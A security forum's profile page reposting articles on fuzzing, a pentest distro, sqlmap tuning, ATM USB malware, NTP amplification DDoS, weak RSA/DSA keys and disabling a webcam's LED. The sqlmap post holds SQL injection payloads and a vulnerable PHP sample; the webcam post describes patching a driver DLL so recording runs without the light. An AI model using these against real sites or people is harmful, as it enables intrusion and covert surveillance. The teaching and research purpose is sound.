Jump to content

Nytro

Administrators
  • Posts

    18736
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. 15 minute guide to fuzzing Matt Hillman August 08, 2013 Have you heard about fuzzing but are not sure what it is or if you should do it? This guide should quickly get you up to speed on what it’s all about. What is fuzzing? Fuzzing is a way of discovering bugs in software by providing randomised inputs to programs to find test cases that cause a crash. Fuzzing your programs can give you a quick view on their overall robustness and help you find and fix critical bugs. Fuzzing is ultimately a black box technique, requiring no access to source code, but it can still be used against software for which you do have source code, because it will potentially find bugs more quickly and avoid the need to review lots of code. Once a crash is detected, if you have the source code, it should become much easier to fix. Pros and cons of fuzzing Fuzzing can be very useful, but it is no silver bullet. Here are some of the pros and cons of fuzzing: Pros Can provide results with little effort: once a fuzzer is up and running, it can be left for hours, days or months to look for bugs with no interaction Can reveal bugs that were missed in a manual audit Provides an overall picture of the robustness of the target software Cons Will not find all bugs: fuzzing may miss bugs that do not trigger a full program crash, and may be less likely to trigger bugs that are only triggered in highly specific circumstances The crashing test cases that are produced may be difficult to analyse, as the act of fuzzing does not give you much knowledge of how the software operates internally Programs with complex inputs can require much more work to produce a smart enough fuzzer to get sufficient code coverage Smart and dumb fuzzing Fuzzers provide random input to software. This may be in the form of a network protocol, a file of a certain format or direct user input. The fuzzed input can be completely random with no knowledge of what the expected input should look like, or it can be created to look like valid input with some alterations. A fuzzer that generates completely random input is known as a “dumb” fuzzer, as it has no built-in intelligence about the program it is fuzzing. A dumb fuzzer requires the smallest amount of work to produce (it could be as simplistic as piping /dev/random into a program). This small amount of work can produce results for very little cost – one of fuzzing’s big advantages. However, sometimes a program will only perform certain processing if particular aspects of the input are present. For example, a program may accept a “name” field in its input, and this field may have a “name length” associated with it. If these fields are not present in a form that is valid enough for the program to identify, it may never attempt to read the name. However, if these fields are present in a valid form, but the length value is set to the incorrect value, the program may read beyond the buffer containing the name and trigger a crash. Without input that is at least partly valid, this is very unlikely to happen. In these cases, “smart” fuzzers can be used. These are programmed with knowledge of the input format (i.e. a protocol definition or rules for a file format). The fuzzer can then construct mostly valid input and only fuzz parts of the input within that basic format. The greater the level of intelligence that you build into a fuzzer, the deeper you may be able to go into a protocol or file format’s processing, but the more work you create for yourself. A balance needs to be found between these two extremes. It can be good to begin with a much more dumb fuzzer and increase its intelligence as the code quality of the software you are testing increases. If you get lots of crashes with a simplistic fuzzer, there is no point spending a long time making it more intelligent until the code quality increases to a point where the code requires it. Types of fuzzer Broadly speaking, fuzzers can be split into two categories based on how they create input to programs – mutation-based and generation-based. This section details those categories as well as offering a brief description of a more advanced technique called Evolutionary Fuzzing. Mutation Mutation-based fuzzers are arguably one of the easier types of fuzzer to create. This technique suites dumb fuzzing but can be used with more intelligent fuzzers as well. With mutation, samples of valid input are mutated randomly to produce malformed input. A dumb mutation fuzzer can simply select a valid sample input and alter parts of it randomly. For many programs, this can provide a surprising amount of mileage, as inputs are still often significantly similar enough to a valid input, so that good code coverage can be achieved without the need for further intelligence. You can build in greater intelligence by allowing the fuzzer to do some level of parsing of the samples to ensure that it only modifies specific parts or that it does not break the overall structure of the input such that it is immediately rejected by the program. Some protocols or file formats will incorporate checksums that will fail if they are modified arbitrarily. A mutation-based fuzzer should usually fix these checksums so that the input is accepted for processing or the only code that will be tested is the checksum validation and nothing else. Two useful techniques that can be used by mutation-based fuzzers are described below. Replay A fuzzer can take saved sample inputs and simply replay them after mutating them. This works well for file format fuzzing where a number of sample files can be saved and fuzzed to provide to the target program. Simple or stateless network protocols can also be fuzzed effectively with replay, as the fuzzer will not need to make lots of legitimate requests to get deep into the protocol. For a more complex protocol, replay may be more difficult as the fuzzer may need to respond in a dynamic way to the program to allow processing to continue deep into the protocol, or the protocol may simply be inherently non-replayable. Man-in-the-Middle or Proxy You may have heard of Man-in-the-Middle (MITM) as a technique used by penetration testers and hackers, but it can also be used for mutation-based network protocol fuzzing. MITM describes the situation where you place yourself in the middle of a client and server (or two clients in the case of peer-to-peer networking), intercepting and possibly modifying messages passed between them. In this way, you are acting like a proxy between the two. The term MITM is generally used when it is not expected that you will be acting like a proxy, but for our purposes the terms are largely interchangeable. By setting your fuzzer up as a proxy, it can mutate requests or responses depending on whether you are fuzzing the server or the client. Again, the fuzzer could have no intelligence about the protocol and simply randomly alter some requests and not others, or it could intelligently target requests at the specific level of the protocol in which you are interested. Proxy-based fuzzing can allow you to take an existing deployment of a networked program and quickly insert a fuzzing layer into it, without needing to make your fuzzer act like a client or server itself. Generation Generation-based fuzzers actually generate input from scratch rather than mutating existing input. Generation-based fuzzers usually require some level of intelligence in order to construct input that makes at least some sense to the program, although generating completely random data would also technically be generation. Generation fuzzers often split a protocol or file format into chunks which they can build up in a valid order, and randomly fuzz some of those chunks independently. This can create inputs that preserve their overall structure, but contain inconsistent data within that structure. The granularity of these chunks and the intelligence with which they are constructed define the level of intelligence of the fuzzer. While mutation-based fuzzing can have a similar effect as generation fuzzing (as, over time, mutations will be randomly applied without completely breaking the input’s structure), generating inputs ensures that this will be so. Generation fuzzing can also get deeper into a protocol more easily, as it can construct valid sequences of inputs applying fuzzing to specific parts of that communication. It also allows the fuzzer to act as a true client/server, generating correct, dynamic responses where these cannot be blindly replayed. Evolutionary Evolutionary fuzzing is an advanced technique, which we will only briefly describe here. It allows the fuzzer to use feedback from each test case to learn over time the format of the input. For example, by measuring the code coverage of each test case, the fuzzer can heuristically work out which properties of the test case exercise a given area of code, and it can gradually evolve a set of test cases that cover the majority of the program code. Evolutionary fuzzing often relies on other techniques similar to genetic algorithms and may require some form of binary instrumentation to operate correctly. What are you really fuzzing? Even for relatively dumb fuzzers, it is important to keep in mind what part of the code your test cases are actually likely to hit. To give a simple example, if you are fuzzing an application protocol that uses TCP/IP and your fuzzer randomly mutates a raw packet capture, you are likely to be corrupting the TCP/IP packets themselves and your input is unlikely to get processed by the application at all. Or, if you were testing an OCR program that parsed images of text into real text, but you were mutating the whole of an image file, you could end up testing its image parsing code more often than the actual OCR code. If you wanted to target that OCR processing specifically, you might wish to keep the headers of the image file valid. Likewise, you may be generating input that is so random that it does not pass an initial sanity check in the program, or the code contains a checksum that you do not correct. You are then only testing that first branch in the program, never getting deeper into the program code. Anatomy of a fuzzer To operate effectively, a fuzzer needs to perform a number of important tasks: Generate test cases Record test cases or any information needed to reproduce them Interface with the target program to provide test cases as input Detect crashes Fuzzers often split many of these tasks out into separate modules, for example having one library that can mutate data or generate it based on a definition and another to provide test cases to the target program and so on. Below are some notes on each of these tasks. Test case generation Generating test cases will vary depending on whether mutation-based or generation-based fuzzing is being employed. With either, there will be something that needs randomly transforming, whether it is a field of a particular type or an arbitrary chunk of data. These transformations can be completely random, but it is worth remembering that edge and corner cases can often be the source of bugs in programs. As such, you may wish to favour such cases and include values such as: Very long or completely blank strings Maximum and minimum values for integers on the platform Values like -1, 0, 1 and 2 Depending on what you are fuzzing, there may be specific values or characters that are more likely to trigger bugs. For example: Null characters New line characters Semi-colons Format string values (%n, %s, etc.) Application specific keywords Reproducibility The simplest way to reproduce a test case is to record the exact input used when a crash is detected. However, there are other ways to ensure reproducibility that can be more convenient in certain circumstances. One way to do this is to store the initial seed used for the random component of test case generation, and ensure that all subsequent random behaviour follows a path that can be traced back to that seed. By re-running the fuzzer with the same seed, the behaviour should be reproducible. For example, you may only record the test case number and the initial seed and then quickly re-execute generation with that seed until you reach the given test case. This technique can be useful when the target program may accumulate dependencies based on past inputs. Previous inputs may have caused the program to initialise various items in its memory that are required to be present to trigger the bug. In these situations, simply recording the crashing test case would not be sufficient to reproduce the bug. Interfacing with the target Interfacing with the target program to provide the fuzzed input is often straightforward. For network protocols, it may simply involve sending the test case over the network, or responding to a client request; for file formats, it may simply mean executing the program with a command line argument pointing to the test case. However, sometimes the input is provided in a form that is not trivial to generate in an automated way or where scripting the program to execute each test case has a high overhead and proves to be very slow. Creative thinking in these cases can reveal ways to exercise the relevant piece of code with the right data. For example, this may be performed by instrumenting a program in memory artificially to execute a parsing function with the input provided as an argument entirely in memory. This can remove the need for the program to go through a lengthy loading procedure before each test case, and further speed increases could be obtained by having test cases generated and provided completely in memory rather than going via the hard drive. Crash detection Crash detection is critical for fuzzing. If you cannot accurately determine when a program has crashed, you will not be able to identify a test case as triggering a bug. There are a number of common ways to approach this: Attach a debugger This will provide you with the most accurate results and you can script the debugger to provide you with a crash trace as soon as a crash is detected. However, having a debugger attached can slow programs significantly and this can cause quite an overhead. The fewer test cases you can generate in a given period of time, the fewer chances you have of finding a crash. See if the process disappears Rather than attaching a debugger, you can simply see if the process ID of the target still exists on the system after executing the test case. If the process has disappeared, it probably crashed. You can re-run the test case in a debugger later if you want some more information about the crash, and you can even do this automatically for each crash, while still avoiding the slowdown of having the debugger attached for every case. Timeout If the program normally responds to your test cases, you can set a timeout after which you assume the program has either crashed or frozen. This can also detect bugs that cause the program to become unresponsive but not necessarily to terminate. Whichever method you use, the program should be restarted whenever it crashes or becomes unresponsive, in order to allow fuzzing to continue. Fuzzing quality There are a number of things you can do to measure or improve the quality of your fuzzing. While these are all good things to keep in mind, you may not need to bother with them all if you are already getting lots of unique crashes within a useful timeframe. Speed Possibly one of the most important factors in fuzzing is speed. How many test cases per second/minute can you run? Sensible values will of course depend on the target, but the more test cases you can execute, the more likely you will be to find a crash in a given time period. Fuzzing is random, so every test case is like a lottery ticket, and you want as many of them as you can get. There are lots of things you can do to increase the speed of your test cases, such as improving the efficiency of your generation or mutation routines, parallelising test cases, decreasing timeouts or running programs in “headless” modes where they do not display a GUI. And of course if you want to, you can simply buy faster kit! Categorising crashes Finding crashes is of course only the start of the process. Once you find a crashing test case, you will need to analyse it, work out what the bug is and either fix it or write an exploit for it depending on your motivation. If you have thousands of crashing test cases, this can be quite daunting. By categorising crashes you can prioritise them according to which ones are most interesting to you. This can also help you identify when one test case is triggering the same bug as another, so you only keep the cases relating to unique crashes. In order to do this, you will need some automated information about the crash so you can make a decision. Running the test case with the target attached to a debugger can provide a crash trace which you can parse to find values such as the exception type, register values, stack contents and so on. One tool by Microsoft which can help with this is called, !exploitable (pronounced “bang exploitable”), which works with the Windbg debugger to categorise crashes according to how exploitable it thinks the bug is. Test case reduction As fuzzing randomly alters input, it is common for a crashing test case to have multiple alterations which are not relevant to triggering the bug. Test case reduction is the act of narrowing down a test case to the minimum set of alterations from a valid input required to trigger the bug, so that you only need to focus on that part of the input in your analysis. This reduction can be performed manually, but it can also be performed automatically by the fuzzer. When a crashing test case is encountered, the fuzzer can re-execute the test case several times, gradually reducing the alterations made to the input until the smallest set of changes remains, whilst still triggering the bug. This can simplify your analysis and may also help to categorise crashing test cases as you will know precisely what parts of the input are affected. Code coverage Code coverage is a measure of how much of the program’s code has been executed by the fuzzer. The idea is that the more coverage you get, the more of the program you have actually tested. Measuring code coverage can be tricky and often requires binary instrumentation to track which portions of code are being executed. You can also measure code coverage in different ways, such as by line, by basic block, by branch or by code path. Code coverage is not a perfect measure with regards to fuzzing, as it is possible to execute code without revealing bugs in it, and there are often areas of code that almost never get executed, such as safety error checks that are unlikely to really be needed and are very unlikely to be interesting to us anyway. Nevertheless, some form of code coverage measurement can provide insight into what your fuzzer is triggering within the program, especially when your fuzzing is completely black box and you may not yet know much about the program’s inner workings. Some tools and technologies that may help with code coverage include Pai Mei, Valgrind, DynamoRIO and DTrace. Fuzzing frameworks There are a number of existing frameworks that allow you to create fuzzers without having to work from scratch. Some of these frameworks are complex and it may still take a while to create a working fuzzer for your target; by contrast, others take a very simple approach. A selection of these frameworks and fuzzers is listed here for your reference: Radamsa Radamsa is designed to be easy to use and flexible. It attempts to “just work” for a variety of input types and contains a number of different fuzzing algorithms for mutation. Sulley Sulley provides a comprehensive generation framework, allowing structured data to be represented for generation based fuzzing. It also contains components to help with recording test cases and detecting crashes. Peach The Peach framework can perform smart fuzzing for file formats and network protocols. It can perform both generation- and mutation-based fuzzing and it contains components to help with modelling and monitoring the target. SPIKE SPIKE is a network protocol fuzzer. It requires good knowledge of C to use and is designed to run on Linux. Grinder Grinder is a web browser fuzzer, which also has features to help in managing large numbers of crashes. NodeFuzz NodeFuzz is a nodejs-based harness for web browsers, which includes instrumentation modules to gain further information from the client side. Sursa: https://www.mwrinfosecurity.com/knowledge-centre/15-minute-guide-to-fuzzing/
      • 1
      • Upvote
  2. [h=2]Web Shell: PHP Meterpreter[/h] Sursa: Web Shell: PHP Meterpreter
  3. Meet Parrot Security OS (a Linux Distro) – Pentesting in the cloud! By Henry Dalziel Information Security Blogger Many of our regular readers and Hacker Hotshot community know by now that we enjoy covering news on Linux Pentesting Distro’s, and whilst the heavy hitters such as Kali Linux and BackBox tend to get most of the lime light, we particularly like exposing upcoming distros, and here is one certainly worth blogging about: Parrot Security OS. Linux Penetration Testing distro’s (call them hacking distro’s if you want) basically revolve around the same premise, i.e. storing ‘best of breed’ pentesting tools within an easy to use Operating System that are efficiently updated. Now, the interesting thing about Parrot Security OS is that the team behind it have a novel way of using the cloud to manage the OS. We have to be honest in that we are not entirely sure how the Cloud Pentesting Distro concept works – and for that reason we’d be grateful if any readers could chime in and drop a comment below to help improve this post. Here’s what we do know about this distro, which does have a feeling that it is packing a punch, is the following: First off, that it is based on Debian GNU/Linux mixed with Frozenbox OS and Kali Linux, to, in their own words: ‘provide the best penetration and security testing experience.’ Certainly, taking the Debian Kali Linux route is a smart move since it is a tried and tested platform that offers reliability. Another thing we do know, is that the design of the distro, as you would expect from a bunch of Italian Pentesters looks very slick and easy on the eye – and let’s be honest, that is important because if you are anything like us you are spending too much time in front of your monitors. Of interest, and on the subject of Italy, we do note that there are several IT security distro’s that hail from Italy, namely BackBox and CAINE (which is actually more of a forensics distro). Learn more and get a copy of Parrot 0.6 here. Pentesting in the cloud This does intrigue us and how it can be applied to a penetration testers operating system. Does the OS fit into a particular cloud service model? As per the National Institute of Standards and Technology (NIST SP800-145) definition there are three cloud service models. They are: Infrastructure as a Service (IaaS): whereby the provider supplies hardware and network connectivity. The tenant on the other hand is responsible for the virtual machine and the software stack that operates within it. Platform as a Service (PaaS): this is when the tenant supplies the web or database application (for example) that they would like to deploy, and the provider supplies all the necessary components required to run the app. Software as a Service (SaaS): this is the last category whereby the provider supplies the app and all the components necessary for its’ operation. SaaS is meant to be a ‘quick-fix’ for the tenant. In Summary We might be way off the mark here – and if we are – please let us know by dropping a comment below. We will be keeping an eye on the Parrot Security OS so please consider this as your first introduction to what looks like a promising project, and don’t forget where you heard it first! On the subject of penetration distro’s, we had an interesting Hacker Hotshot presentation from Andrew Hoog in which he discussed ‘How To Turn BYOD Risk Into Mobile Security Strength’. The reason we are bringing that up is because Andrew is the co-founder of viaForensics and co-developer of Santoku, a distro that focuses on mobile forensics – another niche and interesting area of IT security. We wish the Parrot (Frozen Box) team all the best and look forward to hearing how the project develops. Sursa: Meet Parrot Security OS (a Linux Distro) - Pentesting in the cloud!
  4. Sqlmap Tricks for Advanced SQL Injection Sqlmap is an awesome tool that automates SQL Injection discovery and exploitation processes. I normally use it for exploitation only because I prefer manual detection in order to avoid stressing the web server or being blocked by IPS/WAF devices. Below I provide a basic overview of sqlmap and some configuration tweaks for finding trickier injection points. Basics Using sqlmap for classic SQLi is very straightforward: ./sqlmap.py -u 'http://mywebsite.com/page.php?vulnparam=hello' The target URL after the -u option includes a parameter vulnerable to SQLi (vulnparam). Sqlmap will run a series of tests and detect it very quickly. You can also explicitly tell sqlmap to only test specific parameters with the -p option. This is useful when the query contains various parameters, and you don't want sqlmap to test everyting. You can use the --data option to pass any POST parameters. To maximize successful detection and exploitation, I usually use the --headers option to pass a valid User-Agent header (from my browser for example). Finally, the --cookie option is used to specify any useful Cookie along with the queries (e.g. Session Cookie). Advanced Attack Sometimes sqlmap cannot find tricky injection points and some configuration tweaks are needed. In this example, I will use the Damn Vulnerable Web App (DVWA - Damn Vulnerable Web Application), a deliberately insecure web application used for educational purposes. It uses PHP and a MySQL database. I also customized the source code to simulate a complex injection point. Here is the source of the php file responsible for the Blind SQL Injection exercise located at /[install_dir]/dvwa/vulnerabilities/sqli_blind/source/low.php: [phpcode]<?php if (isset($_GET['Submit'])) { // Retrieve data $id = $_GET['id']; if (!preg_match('/-BR$/', $id)) $html .= '<pre><h2>Wrong ID format</h2></pre>'; else { $id = str_replace("-BR", "", $id); $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid); // Removed 'or die' to suppress mysql errors $num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind' if ($num > 0) $html .= '<pre><h2>User exists!</h2></pre>'; else $html .= '<pre><h2>Unknown user!</h2></pre>'; } } ?>[/phpcode] Basically, this code will receive an ID compounded of a numerical value followed by the string "-BR". The application will first validate whether this string is present and will extract the numerical value. Then, it concatenates this value to the SQL query used to check if it is a valid user ID and returns the result ("User exists!”or “Unknown user!"): This page is clearly vulnerable to SQL Injection but due to the string manipulation routine before the actual SQL command, sqlmap is unable to find it: ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1-BR&Submit=Submit#' --level=5 risk=3 -p id I’m using a valid User-Agent and an authenticated Session Cookie. I’m also forcing sqlmap to test the “id” parameter with the -p option. Even when I set the level and risk of tests to their maximum, sqlmap is not able to find it: To pass the validation and successfully exploit this SQLi, we must inject our payload between the numerical value and the "-BR" suffix. This is a typical Blind SQL Injection instance and I’m lazy, so I don’t want to exploit it manually. For more information about this kind of SQLi, please check this link: https://www.owasp.org/index.php/Blind_SQL_Injection. http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=1+%23-BR&Submit=Submit# http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=0+%23-BR&Submit=Submit# Note that we are URL-encoding special characters because the parameter is located in the URL. The decoded string is: id=1' AND 1=1 #-BR Sqlmap Tweaking How to force sqlmap to inject there? Well, the first idea is to use the --suffix option with the value "-BR" and set "id=1" in the query. It will force sqlmap to add this value after every query. Let’s try it with debug information (-v3 option): ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 risk=3 -p id --suffix="-BR" -v3 I'm still not having any luck. To check what’s going on, we can increase the debug level or set the --proxy=”http://localhost:8080” option to point to your favorite web proxy. It appears sqlmap does not add comments when a suffix is passed to the command line. So every query looks like this: id=1’ AND 1=0 -BR. Obviously, it is not working. Below is how you should handle this situation. The file located at "sqlmap/xml/payloads.xml" contains all the tests sqlmap will perform. It is an XML file and you can add your proper tests to it. As this is a boolean-based blind SQLi instance, I am using the test called "AND boolean-based blind - WHERE or HAVING clause (MySQL comment)" as a template and modifying it. Here is my new test I added to my payload.xml file: Existing user ID: Non-existing user ID: A valid query (True): A non-valid query (False): <test> <title>AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title> <stype>1</stype> <level>1</level> <risk>1</risk> <clause>1</clause> <where>1</where> <vector>AND [INFERENCE] #</vector> <request> <payload>AND [RANDNUM]=[RANDNUM] #</payload> </request> <response> <comparison>AND [RANDNUM]=[RANDNUM1] #</comparison> </response> <details> <dbms>MySQL</dbms> </details> </test> This test simply forces the use of the # character (MySQL comment) in every payload. The original test was using the <comment> tag as a sub-tag of the <request> tag. As we saw, it is not working with suffixes. Now we explicitly want this special character included at the end of every request, before the "-BR" suffix. A detailed description of the available options is included in the payload.xml file, but here is a summary of the settings I used: <title>: the title… duh. <stype>: type of test, 1 means boolean-based blind SQL injection. <level>: level of this test, set to 1 (can be set to anything you want as long as you set the right --level option in the command line). <risk>: risk of this test (like the <level> tag, can be set to anything you want as long as you set the right --risk option in the command line). <clause>: in which clause this will work, 1 means WHERE or HAVING clauses. <where>: where to insert the payload, 1 means appending the payload to the parameter original value. <vector>: the payload used for exploitation and also used to check if the injection point is a false positive. <request>: the payload that will be injected and should trigger a True condition (e.g. ' AND 1=1 #). Here the sub-tag <payload> has to be used. <response>: the payload that will be injected and should trigger a False condition (e.g. ' AND 1=0 #). Here the sub-tag <comparison> has to be used. <details>: set the database in used: MySQL. Here the sub-tag <dbms> has to be used. Let's see if this works: Great! Now we can easily exploit this with sqlmap. sqlmap is a very powerful tool and highly customizable, I really recommend it if you’re not already using it. It can save you a lot of time during a penetration test. Posted by Christophe De La Fuente on 30 December 2013 Sursa: Sqlmap Tricks for Advanced SQL Injection - SpiderLabs Anterior
      • 1
      • Upvote
  5. Cash machines raided with infected USB sticks By Chris Vallance BBC Radio 4 Researchers have revealed how cyber-thieves sliced into cash machines in order to infect them with malware earlier this year. The criminals cut the holes in order to plug in USB drives that installed their code onto the ATMs. Details of the attacks on an unnamed European bank's cash dispensers were presented at the hacker-themed Chaos Computing Congress in Hamburg, Germany. The crimes also appear to indicate the thieves mistrusted each other. The two researchers who detailed the attacks have asked for their names not to be published Access code The thefts came to light in July after the lender involved noticed several its ATMs were being emptied despite their use of safes to protect the cash inside. After surveillance was increased, the bank discovered the criminals were vandalising the machines to use the infected USB sticks. The malware was installed onto the ATMs via USB sticks Once the malware had been transferred they patched the holes up. This allowed the same machines to be targeted several times without the hack being discovered. To activate the code at the time of their choosing the thieves typed in a 12-digit code that launched a special interface. Analysis of software installed onto four of the affected machines demonstrated that it displayed the amount of money available in each denomination of note and presented a series of menu options on the ATM's screen to release each kind. The researchers said this allowed the attackers to focus on the highest value banknotes in order to minimise the amount of time they were exposed. But the crimes' masterminds appeared to be concerned that some of their gang might take the drives and go solo. To counter this risk the software required the thief to enter a second code in response to numbers shown on the ATM's screen before they could release the money. The correct response varied each time and the thief could only obtain the right code by phoning another gang member and telling them the numbers displayed. If they did nothing the machine would return to its normal state after three minutes. The researchers added the organisers displayed "profound knowledge of the target ATMs" and had gone to great lengths to make their malware code hard to analyse. However, they added that the approach did not extend to the software's filenames - the key one was called hack.bat. Sursa: BBC News - Cash machines raided with infected USB sticks
  6. Defcon 21 - Evolving Exploits Through Genetic Algorithms Description: This talk will discuss the next logical step from dumb fuzzing to breeding exploits via machine learning & evolution. Using genetic algorithms, this talk will take simple SQL exploits and breed them into precision tactical weapons. Stop looking at SQL error messages and carefully crafting injections, let genetic algorithms take over and create lethal exploits to PWN sites for you! soen (@soen_vanned) is a reverse engineer and exploit developer for the hacking team V&. As member of the team, he has participated and won Open Capture the Flag DC 16, 18, and 19. Soen also participated in the DDTEK competition in DEF CON 20. 0xSOEN@blogspot.com For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Evolving Exploits Through Genetic Algorithms
  7. [h=1]Attackers Wage Network Time Protocol-Based DDoS Attacks[/h]Kelly Jackson Higgins Attackers have begun exploiting an oft-forgotten network protocol in a new spin on distributed denial-of-service (DDoS) attacks, as researchers spotted a spike in so-called NTP reflection attacks this month. The Network Time Protocol, or NTP, syncs time between machines on the network, and runs over port 123 UDP. It's typically configured once by network administrators and often is not updated, according to Symantec, which discovered a major jump in attacks via the protocol over the past few weeks. "NTP is one of those set-it-and-forget-it protocols that is configured once and most network administrators don't worry about it after that. Unfortunately, that means it is also not a service that is upgraded often, leaving it vulnerable to these reflection attacks," says Allan Liska, a Symantec researcher in blog post last week. Attackers appear to be employing NTP for DDoSing similar to the way DNS is being abused in such attacks. They transmit small spoofed packets requesting a large amount of data sent to the DDoS target's IP address. According to Symantec, it's all about abusing the so-called "monlist" command in an older version of NTP. Monlist returns a list of the last 600 hosts that have connected to the server. "For attackers the monlist query is a great reconnaissance tool. For a localized NTP server it can help to build a network profile. However, as a DDoS tool, it is even better because a small query can redirect megabytes worth of traffic," Liska explains in the post. Monlist modules can be found in NMAP as well as in Metasploit, for example. Metasploit includes monlist DDoS exploit module. The spike in NTP reflection attacks occurred mainly in mid-December, with close to 15,000 IPs affected, and dropped off significantly after December 23, according to Symantec's data,. Symantec recommends that organizations update their NTP implementations to version 4.2.7, which does not use the monlist command. Another option is to disable access to monlist in older versions of NTP. "By disabling monlist, or upgrading so the command is no longer there, not only are you protecting your network from unwanted reconnaissance, but you are also protecting your network from inadvertently being used in a DDoS attack," Liska says. Sursa: Attackers Wage Network Time Protocol-Based DDoS Attacks -- Dark
  8. Detection of Widespread Weak Keys in Network Devices Abstract RSA and DSA can fail catastrophically when used with malfunctioning random number generators, but the extent to which these problems arise in practice has never been comprehensively studied at Internet scale. We perform the largest ever network survey of TLS and SSH servers and present evidence that vulnerable keys are surprisingly widespread. We find that 0.75% of TLS certificates share keys due to insufficient entropy during key generation, and we suspect that another 1.70% come from the same faulty implementations and may be susceptible to compromise. Even more alarmingly, we are able to obtain RSA private keys for 0.50% of TLS hosts and 0.03% of SSH hosts, because their public keys shared nontrivial common factors due to entropy problems, and DSA private keys for 1.03% of SSH hosts, because of insufficient signature randomness. We cluster and investigate the vulnerable hosts, finding that the vast majority appear to be headless or embedded devices. In experiments with three software components commonly used by these devices, we are able to reproduce the vulnerabilities and identify specific software behaviors that induce them, including a boot-time entropy hole in the Linux random number generator. Finally, we suggest defenses and draw lessons for developers, users, and the security community. Download Download the conference version or the more detailed extended version. @InProceedings{weakkeys12, author = {Nadia Heninger and Zakir Durumeric and Eric Wustrow and J. Alex Halderman}, title = {Mining Your {P}s and {Q}s: {D}etection of Widespread Weak Keys in Network Devices}, booktitle = {Proceedings of the 21st {USENIX} Security Symposium}, month = aug, year = 2012 } Sursa: https://factorable.net/paper.html
  9. C. Apoi C++. Apoi orice porcarie iti pofteste inima.
  10. [h=3]How to disable webcam light on Windows[/h] By Robert Graham In recent news, it was revealed the FBI has a "virus" that will record a suspect through the webcam secretly, without turning on the LED light. Some researchers showed this working on an older Macbook. In this post, we do it on Windows. [h=3]Hardware, firmware, driver, software[/h] In theory, the indicator light should be a hardware function. When power is supplied to the sensor, it should also be supplied to an indicator light. This would make the light impossible to hack. However, I don't think anybody does this. In some cases, it's a firmware function. Webcams have their own wimpy microprocessors and run code directly within the webcam. Control the light is one of those firmware functions. Some, like Steve Jobs, might describe this as "hardware" control, because it resides wholly within the webcam hardware, but it's still a form of software. This is especially true because firmware blobs are unsigned, and therefore, can be hacked. In some cases, it's the driver, either within the kernel mode driver that interfaces at a low-level with the hardware, or a DLL that interfaces at a high-level with software. [h=3]How to[/h] As reverse engineers, we simply grab these bits of software/firmware/drivers and open them in our reverse engineering tools, like IDApro. It doesn't take us long to find something to hack. For example, on our Dell laptop, we find the DLL that comes with the RealTek drivers for our webcam. We quickly zero in on the exported function "TurnOnOffLED()". We can quickly make a binary edit to this routine, causing it to return immediately without turning on the light. Dave shows in the in the video below. First, the light turns on as normal, then he stops the webcam, replaces the DLLs with his modified ones, and then turns on the webcam again. As the following video shows, after the change, the webcam is recording him recording the video, but the light is no longer on. [h=3]The deal with USB[/h] Almost all webcams, even those inside your laptop's screen, are USB devices. There is a standard for USB video cameras, the UVC standard. This means most hardware will run under standard operating systems (Windows, Mac, Linux) without drivers from the manufacturer -- at least enough to get Skype working. Only the more advanced features particular to each vendor need vendor specific drivers. According to this standard, the LED indicator light is controlled by the host software. The UVC utilities that come with Linux allow you to control this light directly with a command-line tool, being able to turn off the light while the camera is on. To hack this on Windows appears to require a filter driver. We are too lazy to write one, which is why we just hacked the DLLs in the demonstration above. We believe this is what the FBI has done: a filter driver for the UVC standard would get most webcam products from different vendors, without the FBI haven't to write a custom hack for different vendors. USB has lots of interesting features. It's designed with the idea that a person without root/administrator access may still want to plug in a device and use it. Therefore, there is the idea of "user-mode" drivers, where a non-administrator can nonetheless install drivers to access the USB device. This can be exploited with the Device Firmware Update (DFU) standard. It means in many cases that in user-mode, without administrator privileges, the firmware of the webcam can be updated. The researchers in the paper above demonstrate this with a 2008 MacBook, but in principle, it should work on modern Windows 7 notebook computers as well, using most devices. The problem for a hacker is that they would have to build a hacked firmware for lots of different webcam chips. The upside is that they can do this all without getting root/administrator access to the machine. [h=3]Conclusion[/h] In the above video, Dave shows that the story of the FBI virus secretly enabling the webcam can work on at least one Windows machine. In our research we believe it can be done generically across most any webcam, using most any operating system. Sursa: Errata Security: How to disable webcam light on Windows
  11. [h=1]Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released[/h] December 20th, 2013, 08:35 GMT · By Silviu Stahie Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) has been released and is now available for download and testing. We prepared a screenshot tour to get a sneak peek at the new operating system. The best news for the fans of Ubuntu GNOME is that the 14.04 will include a number of GNOME applications from the 3.10 stack. Also, the GNOME Classic session has been included. To try it, users just have to choose it from the Sessions option on the login screen. “The Alpha 1 Trusty Tahr snapshot includes the 3.12.0.7 Ubuntu Linux kernel which is based on the the upstream v3.12.4 Linux kernel. The 3.12 release contains improvements to the dynamic tick code, support infrastructure for DRM render nodes, TSO sizing and the FQ scheduler in the network layer, support for user namespaces in the XFS filesystem, multithreaded RAID5 in the MD subsystem, and more,” reads the official announcement. Check it out for more details about this release. Download Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) right now from Softpedia. Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only. Sursa: Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released – Screenshot Tour
